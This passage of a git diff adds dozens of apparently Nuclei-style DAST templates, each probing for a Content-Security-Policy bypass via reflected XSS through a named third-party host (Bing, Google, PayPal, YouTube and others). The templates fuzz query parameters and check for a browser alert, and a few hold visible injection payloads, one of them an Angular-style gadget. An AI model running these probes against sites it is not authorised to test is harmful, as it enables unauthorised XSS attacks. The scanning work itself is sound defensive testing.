"www_api_ibm_csp_xss == true" \ No newline at end of file diff --git a/dast/vulnerabilities/xss/csp/www-bing-csp-xss.yaml b/dast/vulnerabilities/xss/csp/www-bing-csp-xss.yaml new file mode 100644 index 00000000000..7e27eecdcee --- /dev/null +++ b/dast/vulnerabilities/xss/csp/www-bing-csp-xss.yaml @@ -0,0 +1,55 @@ +id: www-bing-csp-xss + +info: + name: Content-Security-Policy Bypass via Bing API + author: renniepak,DhiyaneshDK + severity: medium + reference: + - https://github.com/renniepak/CSPBypass/blob/main/data.tsv + metadata: + verified: true + tags: xss,csp-bypass,bing + +http: + - pre-condition: + - type: dsl + dsl: + - 'method == "GET"' + + payloads: + injection: + - '' + + fuzzing: + - part: query + type: replace + mode: single + fuzz: + - "{{url_encode(injection)}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "{{injection}}" + internal: true + +headless: + - steps: + - action: navigate + args: + url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}" + + - action: waitload + + - action: waitdialog + name: www_bing_csp_xss + args: + type: alert + timeout: 5000 + + matchers: + - type: dsl + dsl: + - "www_bing_csp_xss == true" \ No newline at end of file diff --git a/dast/vulnerabilities/xss/csp/www-blogger-csp-xss.yaml b/dast/vulnerabilities/xss/csp/www-blogger-csp-xss.yaml new file mode 100644 index 00000000000..5411b007ad8 --- /dev/null +++ b/dast/vulnerabilities/xss/csp/www-blogger-csp-xss.yaml @@ -0,0 +1,55 @@ +id: www-blogger-csp-xss + +info: + name: Content-Security-Policy Bypass via Blogger API + author: renniepak,DhiyaneshDK + severity: medium + reference: + - https://github.com/renniepak/CSPBypass/blob/main/data.tsv + metadata: + verified: true + tags: xss,csp-bypass,blogger + +http: + - pre-condition: + - type: dsl + dsl: + - 'method == "GET"' + + payloads: + injection: + - '' + + fuzzing: + - part: query + type: replace + mode: single + fuzz: + - "{{url_encode(injection)}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "{{injection}}" + internal: true + +headless: + - steps: + - action: navigate + args: + url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}" + + - action: waitload + + - action: waitdialog + name: www_blogger_csp_xss + args: + type: alert + timeout: 5000 + + matchers: + - type: dsl + dsl: + - "www_blogger_csp_xss == true" \ No newline at end of file diff --git a/dast/vulnerabilities/xss/csp/www-google-analytics-csp-xss.yaml b/dast/vulnerabilities/xss/csp/www-google-analytics-csp-xss.yaml new file mode 100644 index 00000000000..7b735dabe0e --- /dev/null +++ b/dast/vulnerabilities/xss/csp/www-google-analytics-csp-xss.yaml @@ -0,0 +1,55 @@ +id: www-google-analytics-csp-xss + +info: + name: Content-Security-Policy Bypass via Google Analytics + author: renniepak,DhiyaneshDK + severity: medium + reference: + - https://github.com/renniepak/CSPBypass/blob/main/data.tsv + metadata: + verified: true + tags: xss,csp-bypass,google-analytics + +http: + - pre-condition: + - type: dsl + dsl: + - 'method == "GET"' + + payloads: + injection: + - '' + + fuzzing: + - part: query + type: replace + mode: single + fuzz: + - "{{url_encode(injection)}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "{{injection}}" + internal: true + +headless: + - steps: + - action: navigate + args: + url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}" + + - action: waitload + + - action: waitdialog + name: www_google_analytics_csp_xss + args: + type: alert + timeout: 5000 + + matchers: + - type: dsl + dsl: + - "www_google_analytics_csp_xss == true" \ No newline at end of file diff --git a/dast/vulnerabilities/xss/csp/www-google-recaptcha-csp-xss.yaml b/dast/vulnerabilities/xss/csp/www-google-recaptcha-csp-xss.yaml new file mode 100644 index 00000000000..1e1c2f12c4b --- /dev/null +++ b/dast/vulnerabilities/xss/csp/www-google-recaptcha-csp-xss.yaml @@ -0,0 +1,55 @@ +id: www-google-recaptcha-csp-xss + +info: + name: Content-Security-Policy Bypass via Google ReCaptcha + author: renniepak,DhiyaneshDK + severity: medium + reference: + - https://github.com/renniepak/CSPBypass/blob/main/data.tsv + metadata: + verified: true + tags: xss,csp-bypass,google + +http: + - pre-condition: + - type: dsl + dsl: + - 'method == "GET"' + + payloads: + injection: + - '' + + fuzzing: + - part: query + type: replace + mode: single + fuzz: + - "{{url_encode(injection)}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "{{injection}}" + internal: true + +headless: + - steps: + - action: navigate + args: + url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}" + + - action: waitload + + - action: waitdialog + name: www_google_recaptcha_csp_xss + args: + type: alert + timeout: 5000 + + matchers: + - type: dsl + dsl: + - "www_google_recaptcha_csp_xss == true" \ No newline at end of file diff --git a/dast/vulnerabilities/xss/csp/www-google-search-csp-xss.yaml b/dast/vulnerabilities/xss/csp/www-google-search-csp-xss.yaml new file mode 100644 index 00000000000..5a5b7dd148b --- /dev/null +++ b/dast/vulnerabilities/xss/csp/www-google-search-csp-xss.yaml @@ -0,0 +1,55 @@ +id: www-google-search-csp-xss + +info: + name: Content-Security-Policy Bypass via Google Search + author: renniepak,DhiyaneshDK + severity: medium + reference: + - https://github.com/renniepak/CSPBypass/blob/main/data.tsv + metadata: + verified: true + tags: xss,csp-bypass,google + +http: + - pre-condition: + - type: dsl + dsl: + - 'method == "GET"' + + payloads: + injection: + - '' + + fuzzing: + - part: query + type: replace + mode: single + fuzz: + - "{{url_encode(injection)}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "{{injection}}" + internal: true + +headless: + - steps: + - action: navigate + args: + url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}" + + - action: waitload + + - action: waitdialog + name: www_google_search_csp_xss + args: + type: alert + timeout: 5000 + + matchers: + - type: dsl + dsl: + - "www_google_search_csp_xss == true" \ No newline at end of file diff --git a/dast/vulnerabilities/xss/csp/www-googleapis-blogger-csp-xss.yaml b/dast/vulnerabilities/xss/csp/www-googleapis-blogger-csp-xss.yaml new file mode 100644 index 00000000000..053304ed5fb --- /dev/null +++ b/dast/vulnerabilities/xss/csp/www-googleapis-blogger-csp-xss.yaml @@ -0,0 +1,55 @@ +id: www-googleapis-blogger-csp-xss + +info: + name: Content-Security-Policy Bypass via Google APIs Blogger + author: renniepak,DhiyaneshDK + severity: medium + reference: + - https://github.com/renniepak/CSPBypass/blob/main/data.tsv + metadata: + verified: true + tags: xss,csp-bypass,googleapis + +http: + - pre-condition: + - type: dsl + dsl: + - 'method == "GET"' + + payloads: + injection: + - '' + + fuzzing: + - part: query + type: replace + mode: single + fuzz: + - "{{url_encode(injection)}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "{{injection}}" + internal: true + +headless: + - steps: + - action: navigate + args: + url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}" + + - action: waitload + + - action: waitdialog + name: www_googleapis_blogger_csp_xss + args: + type: alert + timeout: 5000 + + matchers: + - type: dsl + dsl: + - "www_googleapis_blogger_csp_xss == true" \ No newline at end of file diff --git a/dast/vulnerabilities/xss/csp/www-googleapis-customsearch-csp-xss.yaml b/dast/vulnerabilities/xss/csp/www-googleapis-customsearch-csp-xss.yaml new file mode 100644 index 00000000000..bb1145a3aa3 --- /dev/null +++ b/dast/vulnerabilities/xss/csp/www-googleapis-customsearch-csp-xss.yaml @@ -0,0 +1,55 @@ +id: www-googleapis-customsearch-csp-xss + +info: + name: Content-Security-Policy Bypass via Google APIs Custom Search + author: renniepak,DhiyaneshDK + severity: medium + reference: + - https://github.com/renniepak/CSPBypass/blob/main/data.tsv + metadata: + verified: true + tags: xss,csp-bypass,googleapis + +http: + - pre-condition: + - type: dsl + dsl: + - 'method == "GET"' + + payloads: + injection: + - '' + + fuzzing: + - part: query + type: replace + mode: single + fuzz: + - "{{url_encode(injection)}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "{{injection}}" + internal: true + +headless: + - steps: + - action: navigate + args: + url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}" + + - action: waitload + + - action: waitdialog + name: www_googleapis_customsearch_csp_xss + args: + type: alert + timeout: 5000 + + matchers: + - type: dsl + dsl: + - "www_googleapis_customsearch_csp_xss == true" \ No newline at end of file diff --git a/dast/vulnerabilities/xss/csp/www-googletagmanager-csp-xss.yaml b/dast/vulnerabilities/xss/csp/www-googletagmanager-csp-xss.yaml new file mode 100644 index 00000000000..87824d5cf1e --- /dev/null +++ b/dast/vulnerabilities/xss/csp/www-googletagmanager-csp-xss.yaml @@ -0,0 +1,55 @@ +id: www-googletagmanager-csp-xss + +info: + name: Content-Security-Policy Bypass via Google Tag Manager + author: renniepak,DhiyaneshDK + severity: medium + reference: + - https://github.com/renniepak/CSPBypass/blob/main/data.tsv + metadata: + verified: true + tags: xss,csp-bypass,googletagmanager + +http: + - pre-condition: + - type: dsl + dsl: + - 'method == "GET"' + + payloads: + injection: + - '' + + fuzzing: + - part: query + type: replace + mode: single + fuzz: + - "{{url_encode(injection)}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "{{injection}}" + internal: true + +headless: + - steps: + - action: navigate + args: + url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}" + + - action: waitload + + - action: waitdialog + name: www_googletagmanager_csp_xss + args: + type: alert + timeout: 5000 + + matchers: + - type: dsl + dsl: + - "www_googletagmanager_csp_xss == true" \ No newline at end of file diff --git a/dast/vulnerabilities/xss/csp/www-gstatic-angular-csp-xss.yaml b/dast/vulnerabilities/xss/csp/www-gstatic-angular-csp-xss.yaml new file mode 100644 index 00000000000..f5ecae7026f --- /dev/null +++ b/dast/vulnerabilities/xss/csp/www-gstatic-angular-csp-xss.yaml @@ -0,0 +1,55 @@ +id: www-gstatic-angular-csp-xss + +info: + name: Content-Security-Policy Bypass via GStatic Angular + author: renniepak,DhiyaneshDK + severity: medium + reference: + - https://github.com/renniepak/CSPBypass/blob/main/data.tsv + metadata: + verified: true + tags: xss,csp-bypass,gstatic + +http: + - pre-condition: + - type: dsl + dsl: + - 'method == "GET"' + + payloads: + injection: + - '' + + fuzzing: + - part: query + type: replace + mode: single + fuzz: + - "{{url_encode(injection)}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "{{injection}}" + internal: true + +headless: + - steps: + - action: navigate + args: + url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}" + + - action: waitload + + - action: waitdialog + name: www_gstatic_angular_csp_xss + args: + type: alert + timeout: 5000 + + matchers: + - type: dsl + dsl: + - "www_gstatic_angular_csp_xss == true" \ No newline at end of file diff --git a/dast/vulnerabilities/xss/csp/www-gstatic-recaptcha-csp-xss.yaml b/dast/vulnerabilities/xss/csp/www-gstatic-recaptcha-csp-xss.yaml new file mode 100644 index 00000000000..fa3430b3823 --- /dev/null +++ b/dast/vulnerabilities/xss/csp/www-gstatic-recaptcha-csp-xss.yaml @@ -0,0 +1,55 @@ +id: www-gstatic-recaptcha-csp-xss + +info: + name: Content-Security-Policy Bypass via GStatic ReCaptcha + author: renniepak,DhiyaneshDK + severity: medium + reference: + - https://github.com/renniepak/CSPBypass/blob/main/data.tsv + metadata: + verified: true + tags: xss,csp-bypass,gstatic + +http: + - pre-condition: + - type: dsl + dsl: + - 'method == "GET"' + + payloads: + injection: + - '' + + fuzzing: + - part: query + type: replace + mode: single + fuzz: + - "{{url_encode(injection)}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "{{injection}}" + internal: true + +headless: + - steps: + - action: navigate + args: + url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}" + + - action: waitload + + - action: waitdialog + name: www_gstatic_recaptcha_csp_xss + args: + type: alert + timeout: 5000 + + matchers: + - type: dsl + dsl: + - "www_gstatic_recaptcha_csp_xss == true" \ No newline at end of file diff --git a/dast/vulnerabilities/xss/csp/www-meteoprog-csp-xss.yaml b/dast/vulnerabilities/xss/csp/www-meteoprog-csp-xss.yaml new file mode 100644 index 00000000000..65bdba26478 --- /dev/null +++ b/dast/vulnerabilities/xss/csp/www-meteoprog-csp-xss.yaml @@ -0,0 +1,55 @@ +id: www-meteoprog-csp-xss + +info: + name: Content-Security-Policy Bypass via Meteoprog + author: renniepak,DhiyaneshDK + severity: medium + reference: + - https://github.com/renniepak/CSPBypass/blob/main/data.tsv + metadata: + verified: true + tags: xss,csp-bypass,meteoprog + +http: + - pre-condition: + - type: dsl + dsl: + - 'method == "GET"' + + payloads: + injection: + - '' + + fuzzing: + - part: query + type: replace + mode: single + fuzz: + - "{{url_encode(injection)}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "{{injection}}" + internal: true + +headless: + - steps: + - action: navigate + args: + url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}" + + - action: waitload + + - action: waitdialog + name: www_meteoprog_csp_xss + args: + type: alert + timeout: 5000 + + matchers: + - type: dsl + dsl: + - "www_meteoprog_csp_xss == true" \ No newline at end of file diff --git a/dast/vulnerabilities/xss/csp/www-microsoft-csp-xss.yaml b/dast/vulnerabilities/xss/csp/www-microsoft-csp-xss.yaml new file mode 100644 index 00000000000..1c3983f9470 --- /dev/null +++ b/dast/vulnerabilities/xss/csp/www-microsoft-csp-xss.yaml @@ -0,0 +1,55 @@ +id: www-microsoft-csp-xss + +info: + name: Content-Security-Policy Bypass via Microsoft API + author: renniepak,DhiyaneshDK + severity: medium + reference: + - https://github.com/renniepak/CSPBypass/blob/main/data.tsv + metadata: + verified: true + tags: xss,csp-bypass,microsoft + +http: + - pre-condition: + - type: dsl + dsl: + - 'method == "GET"' + + payloads: + injection: + - '' + + fuzzing: + - part: query + type: replace + mode: single + fuzz: + - "{{url_encode(injection)}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "{{injection}}" + internal: true + +headless: + - steps: + - action: navigate + args: + url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}" + + - action: waitload + + - action: waitdialog + name: www_microsoft_csp_xss + args: + type: alert + timeout: 5000 + + matchers: + - type: dsl + dsl: + - "www_microsoft_csp_xss == true" \ No newline at end of file diff --git a/dast/vulnerabilities/xss/csp/www-paypal-csp-xss.yaml b/dast/vulnerabilities/xss/csp/www-paypal-csp-xss.yaml new file mode 100644 index 00000000000..18d09a3730a --- /dev/null +++ b/dast/vulnerabilities/xss/csp/www-paypal-csp-xss.yaml @@ -0,0 +1,55 @@ +id: www-paypal-csp-xss + +info: + name: Content-Security-Policy Bypass via PayPal API + author: renniepak,DhiyaneshDK + severity: medium + reference: + - https://github.com/renniepak/CSPBypass/blob/main/data.tsv + metadata: + verified: true + tags: xss,csp-bypass,paypal + +http: + - pre-condition: + - type: dsl + dsl: + - 'method == "GET"' + + payloads: + injection: + - '' + + fuzzing: + - part: query + type: replace + mode: single + fuzz: + - "{{url_encode(injection)}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "{{injection}}" + internal: true + +headless: + - steps: + - action: navigate + args: + url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}" + + - action: waitload + + - action: waitdialog + name: www_paypal_csp_xss + args: + type: alert + timeout: 5000 + + matchers: + - type: dsl + dsl: + - "www_paypal_csp_xss == true" \ No newline at end of file diff --git a/dast/vulnerabilities/xss/csp/www-recaptcha-csp-xss.yaml b/dast/vulnerabilities/xss/csp/www-recaptcha-csp-xss.yaml new file mode 100644 index 00000000000..5413aeeaf52 --- /dev/null +++ b/dast/vulnerabilities/xss/csp/www-recaptcha-csp-xss.yaml @@ -0,0 +1,55 @@ +id: www-recaptcha-csp-xss + +info: + name: Content-Security-Policy Bypass via ReCaptcha + author: renniepak,DhiyaneshDK + severity: medium + reference: + - https://github.com/renniepak/CSPBypass/blob/main/data.tsv + metadata: + verified: true + tags: xss,csp-bypass,recaptcha + +http: + - pre-condition: + - type: dsl + dsl: + - 'method == "GET"' + + payloads: + injection: + - '' + + fuzzing: + - part: query + type: replace + mode: single + fuzz: + - "{{url_encode(injection)}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "{{injection}}" + internal: true + +headless: + - steps: + - action: navigate + args: + url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}" + + - action: waitload + + - action: waitdialog + name: www_recaptcha_csp_xss + args: + type: alert + timeout: 5000 + + matchers: + - type: dsl + dsl: + - "www_recaptcha_csp_xss == true" \ No newline at end of file diff --git a/dast/vulnerabilities/xss/csp/www-reddit-csp-xss.yaml b/dast/vulnerabilities/xss/csp/www-reddit-csp-xss.yaml new file mode 100644 index 00000000000..ec114e8d865 --- /dev/null +++ b/dast/vulnerabilities/xss/csp/www-reddit-csp-xss.yaml @@ -0,0 +1,55 @@ +id: www-reddit-csp-xss + +info: + name: Content-Security-Policy Bypass via Reddit API + author: renniepak,DhiyaneshDK + severity: medium + reference: + - https://github.com/renniepak/CSPBypass/blob/main/data.tsv + metadata: + verified: true + tags: xss,csp-bypass,reddit + +http: + - pre-condition: + - type: dsl + dsl: + - 'method == "GET"' + + payloads: + injection: + - '' + + fuzzing: + - part: query + type: replace + mode: single + fuzz: + - "{{url_encode(injection)}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "{{injection}}" + internal: true + +headless: + - steps: + - action: navigate + args: + url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}" + + - action: waitload + + - action: waitdialog + name: www_reddit_csp_xss + args: + type: alert + timeout: 5000 + + matchers: + - type: dsl + dsl: + - "www_reddit_csp_xss == true" \ No newline at end of file diff --git a/dast/vulnerabilities/xss/csp/www-roblox-csp-xss.yaml b/dast/vulnerabilities/xss/csp/www-roblox-csp-xss.yaml new file mode 100644 index 00000000000..aa997321c6c --- /dev/null +++ b/dast/vulnerabilities/xss/csp/www-roblox-csp-xss.yaml @@ -0,0 +1,55 @@ +id: www-roblox-csp-xss + +info: + name: Content-Security-Policy Bypass via Roblox API + author: renniepak,DhiyaneshDK + severity: medium + reference: + - https://github.com/renniepak/CSPBypass/blob/main/data.tsv + metadata: + verified: true + tags: xss,csp-bypass,roblox + +http: + - pre-condition: + - type: dsl + dsl: + - 'method == "GET"' + + payloads: + injection: + - '' + + fuzzing: + - part: query + type: replace + mode: single + fuzz: + - "{{url_encode(injection)}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "{{injection}}" + internal: true + +headless: + - steps: + - action: navigate + args: + url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}" + + - action: waitload + + - action: waitdialog + name: www_roblox_csp_xss + args: + type: alert + timeout: 5000 + + matchers: + - type: dsl + dsl: + - "www_roblox_csp_xss == true" \ No newline at end of file diff --git a/dast/vulnerabilities/xss/csp/www-st-csp-xss.yaml b/dast/vulnerabilities/xss/csp/www-st-csp-xss.yaml new file mode 100644 index 00000000000..802a283244f --- /dev/null +++ b/dast/vulnerabilities/xss/csp/www-st-csp-xss.yaml @@ -0,0 +1,55 @@ +id: www-st-csp-xss + +info: + name: Content-Security-Policy Bypass via ST + author: renniepak,DhiyaneshDK + severity: medium + reference: + - https://github.com/renniepak/CSPBypass/blob/main/data.tsv + metadata: + verified: true + tags: xss,csp-bypass,st + +http: + - pre-condition: + - type: dsl + dsl: + - 'method == "GET"' + + payloads: + injection: + - '' + + fuzzing: + - part: query + type: replace + mode: single + fuzz: + - "{{url_encode(injection)}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "{{injection}}" + internal: true + +headless: + - steps: + - action: navigate + args: + url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}" + + - action: waitload + + - action: waitdialog + name: www_st_csp_xss + args: + type: alert + timeout: 5000 + + matchers: + - type: dsl + dsl: + - "www_st_csp_xss == true" \ No newline at end of file diff --git a/dast/vulnerabilities/xss/csp/www-yastat-csp-xss.yaml b/dast/vulnerabilities/xss/csp/www-yastat-csp-xss.yaml new file mode 100644 index 00000000000..22618996e13 --- /dev/null +++ b/dast/vulnerabilities/xss/csp/www-yastat-csp-xss.yaml @@ -0,0 +1,55 @@ +id: www-yastat-csp-xss + +info: + name: Content-Security-Policy Bypass via Yastat + author: renniepak,DhiyaneshDK + severity: medium + reference: + - https://github.com/renniepak/CSPBypass/blob/main/data.tsv + metadata: + verified: true + tags: xss,csp-bypass,yastat + +http: + - pre-condition: + - type: dsl + dsl: + - 'method == "GET"' + + payloads: + injection: + - '
' + + fuzzing: + - part: query + type: replace + mode: single + fuzz: + - "{{url_encode(injection)}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "{{injection}}" + internal: true + +headless: + - steps: + - action: navigate + args: + url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}" + + - action: waitload + + - action: waitdialog + name: www_yastat_csp_xss + args: + type: alert + timeout: 5000 + + matchers: + - type: dsl + dsl: + - "www_yastat_csp_xss == true" \ No newline at end of file diff --git a/dast/vulnerabilities/xss/csp/www-yastatic-csp-xss.yaml b/dast/vulnerabilities/xss/csp/www-yastatic-csp-xss.yaml new file mode 100644 index 00000000000..69cd3522fde --- /dev/null +++ b/dast/vulnerabilities/xss/csp/www-yastatic-csp-xss.yaml @@ -0,0 +1,55 @@ +id: www-yastatic-csp-xss + +info: + name: Content-Security-Policy Bypass via Yastatic + author: renniepak,DhiyaneshDK + severity: medium + reference: + - https://github.com/renniepak/CSPBypass/blob/main/data.tsv + metadata: + verified: true + tags: xss,csp-bypass,yastatic + +http: + - pre-condition: + - type: dsl + dsl: + - 'method == "GET"' + + payloads: + injection: + - '
' + + fuzzing: + - part: query + type: replace + mode: single + fuzz: + - "{{url_encode(injection)}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "{{injection}}" + internal: true + +headless: + - steps: + - action: navigate + args: + url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}" + + - action: waitload + + - action: waitdialog + name: www_yastatic_csp_xss + args: + type: alert + timeout: 5000 + + matchers: + - type: dsl + dsl: + - "www_yastatic_csp_xss == true" \ No newline at end of file diff --git a/dast/vulnerabilities/xss/csp/www-youtube-csp-xss.yaml b/dast/vulnerabilities/xss/csp/www-youtube-csp-xss.yaml new file mode 100644 index 00000000000..471a4bf0dcb --- /dev/null +++ b/dast/vulnerabilities/xss/csp/www-youtube-csp-xss.yaml @@ -0,0 +1,55 @@ +id: www-youtube-csp-xss + +info: + name: Content-Security-Policy Bypass via YouTube API + author: renniepak,DhiyaneshDK + severity: medium + reference: + - https://github.com/renniepak/CSPBypass/blob/main/data.tsv + metadata: + verified: true + tags: xss,csp-bypass,youtube + +http: + - pre-condition: + - type: dsl + dsl: + - 'method == "GET"' + + payloads: + injection: + - '' + + fuzzing: + - part: query + type: replace + mode: single + fuzz: + - "{{url_encode(injection)}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "{{injection}}" + internal: true + +headless: + - steps: + - action: navigate + args: + url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}" + + - action: waitload + + - action: waitdialog + name: www_youtube_csp_xss + args: + type: alert + timeout: 5000 + + matchers: + - type: dsl + dsl: + - "www_youtube_csp_xss == true" \ No newline at end of file diff --git a/dast/vulnerabilities/xss/csp/x-api-csp-xss.yaml b/dast/vulnerabilities/xss/csp/x-api-csp-xss.yaml new file mode 100644 index 00000000000..0579b7c5379 --- /dev/null +++ b/dast/vulnerabilities/xss/csp/x-api-csp-xss.yaml @@ -0,0 +1,55 @@ +id: x-api-csp-xss + +info: + name: Content-Security-Policy Bypass via X API + author: renniepak,DhiyaneshDK + severity: medium + reference: + - https://github.com/renniepak/CSPBypass/blob/main/data.tsv + metadata: + verified: true + tags: xss,csp-bypass,x + +http: + - pre-condition: + - type: dsl + dsl: + - 'method == "GET"' + + payloads: + injection: + - '' + + fuzzing: + - part: query + type: replace + mode: single + fuzz: + - "{{url_encode(injection)}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "{{injection}}" + internal: true + +headless: + - steps: + - action: navigate + args: + url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}" + + - action: waitload + + - action: waitdialog + name: x_api_csp_xss + args: + type: alert + timeout: 5000 + + matchers: + - type: dsl + dsl: + - "x_api_csp_xss == true" \ No newline at end of file diff --git a/dast/vulnerabilities/xss/csp/yahoo-ads-yap-csp-xss.yaml b/dast/vulnerabilities/xss/csp/yahoo-ads-yap-csp-xss.yaml new file mode 100644 index 00000000000..b1d89c2432b --- /dev/null +++ b/dast/vulnerabilities/xss/csp/yahoo-ads-yap-csp-xss.yaml @@ -0,0 +1,55 @@ +id: yahoo-ads-yap-csp-xss + +info: + name: Content-Security-Policy Bypass via Yahoo Ads Yap + author: renniepak,DhiyaneshDK + severity: medium + reference: + - https://github.com/renniepak/CSPBypass/blob/main/data.tsv + metadata: + verified: true + tags: xss,csp-bypass,yahoo + +http: + - pre-condition: + - type: dsl + dsl: + - 'method == "GET"' + + payloads: + injection: + - '' + + fuzzing: + - part: query + type: replace + mode: single + fuzz: + - "{{url_encode(injection)}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "{{injection}}" + internal: true + +headless: + - steps: + - action: navigate + args: + url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}" + + - action: waitload + + - action: waitdialog + name: yahoo_ads_yap_csp_xss + args: + type: alert + timeout: 5000 + + matchers: + - type: dsl + dsl: + - "yahoo_ads_yap_csp_xss == true" \ No newline at end of file diff --git a/dast/vulnerabilities/xss/csp/yandex-st-csp-xss.yaml b/dast/vulnerabilities/xss/csp/yandex-st-csp-xss.yaml new file mode 100644 index 00000000000..a78fd01c02e --- /dev/null +++ b/dast/vulnerabilities/xss/csp/yandex-st-csp-xss.yaml @@ -0,0 +1,55 @@ +id: yandex-st-csp-xss + +info: + name: Content-Security-Policy Bypass via Yandex ST + author: renniepak,DhiyaneshDK + severity: medium + reference: + - https://github.com/renniepak/CSPBypass/blob/main/data.tsv + metadata: + verified: true + tags: xss,csp-bypass,yandex + +http: + - pre-condition: + - type: dsl + dsl: + - 'method == "GET"' + + payloads: + injection: + - '' + + fuzzing: + - part: query + type: replace + mode: single + fuzz: + - "{{url_encode(injection)}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "{{injection}}" + internal: true + +headless: + - steps: + - action: navigate + args: + url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}" + + - action: waitload + + - action: waitdialog + name: yandex_st_csp_xss + args: + type: alert + timeout: 5000 + + matchers: + - type: dsl + dsl: + - "yandex_st_csp_xss == true" \ No newline at end of file diff --git a/dast/vulnerabilities/xss/csp/youtube-csp-xss.yaml b/dast/vulnerabilities/xss/csp/youtube-csp-xss.yaml new file mode 100644 index 00000000000..436526cd83f --- /dev/null +++ b/dast/vulnerabilities/xss/csp/youtube-csp-xss.yaml @@ -0,0 +1,55 @@ +id: youtube-csp-xss + +info: + name: Content-Security-Policy Bypass via YouTube + author: renniepak,DhiyaneshDK + severity: medium + reference: + - https://github.com/renniepak/CSPBypass/blob/main/data.tsv + metadata: + verified: true + tags: xss,csp-bypass,youtube + +http: + - pre-condition: + - type: dsl + dsl: + - 'method == "GET"' + + payloads: + injection: + - '' + + fuzzing: + - part: query + type: replace + mode: single + fuzz: + - "{{url_encode(injection)}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "{{injection}}" + internal: true + +headless: + - steps: + - action: navigate + args: + url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}" + + - action: waitload + + - action: waitdialog + name: youtube_csp_xss + args: + type: alert + timeout: 5000 + + matchers: + - type: dsl + dsl: + - "youtube_csp_xss == true" \ No newline at end of file diff --git a/dast/vulnerabilities/xss/csp/yuedust-yuedu-csp-xss.yaml b/dast/vulnerabilities/xss/csp/yuedust-yuedu-csp-xss.yaml new file mode 100644 index 00000000000..65067a2cc57 --- /dev/null +++ b/dast/vulnerabilities/xss/csp/yuedust-yuedu-csp-xss.yaml @@ -0,0 +1,55 @@ +id: yuedust-yuedu-csp-xss + +info: + name: Content-Security-Policy Bypass via Yuedust Yuedu + author: renniepak,DhiyaneshDK + severity: medium + reference: + - https://github.com/renniepak/CSPBypass/blob/main/data.tsv + metadata: + verified: true + tags: xss,csp-bypass,yuedust + +http: + - pre-condition: + - type: dsl + dsl: + - 'method == "GET"' + + payloads: + injection: + - '
foo
{{ [1].reduce(value.alert, 1); }}
' + + fuzzing: + - part: query + type: replace + mode: single + fuzz: + - "{{url_encode(injection)}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "{{injection}}" + internal: true + +headless: + - steps: + - action: navigate + args: + url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}" + + - action: waitload + + - action: waitdialog + name: yuedust_yuedu_csp_xss + args: + type: alert + timeout: 5000 + + matchers: + - type: dsl + dsl: + - "yuedust_yuedu_csp_xss == true" \ No newline at end of file diff --git a/dast/vulnerabilities/xss/csp/yugiohmonstrosdeduelo-blogspot-csp-xss.yaml b/dast/vulnerabilities/xss/csp/yugiohmonstrosdeduelo-blogspot-csp-xss.yaml new file mode 100644 index 00000000000..e953ae350af --- /dev/null +++ b/dast/vulnerabilities/xss/csp/yugiohmonstrosdeduelo-blogspot-csp-xss.yaml @@ -0,0 +1,55 @@ +id: yugiohmonstrosdeduelo-blogspot-csp-xss + +info: + name: Content-Security-Policy Bypass via Yugioh Blogspot + author: renniepak,DhiyaneshDK + severity: medium + reference: + - https://github.com/renniepak/CSPBypass/blob/main/data.tsv + metadata: + verified: true + tags: xss,csp-bypass,blogspot + +http: + - pre-condition: + - type: dsl + dsl: + - 'method == "GET"' + + payloads: + injection: + - '' + + fuzzing: + - part: query + type: replace + mode: single + fuzz: + - "{{url_encode(injection)}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "{{injection}}" + internal: true + +headless: + - steps: + - action: navigate + args: + url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}" + + - action: waitload + + - action: waitdialog + name: yugiohmonstrosdeduelo_blogspot_csp_xss + args: + type: alert + timeout: 5000 + + matchers: + - type: dsl + dsl: + - 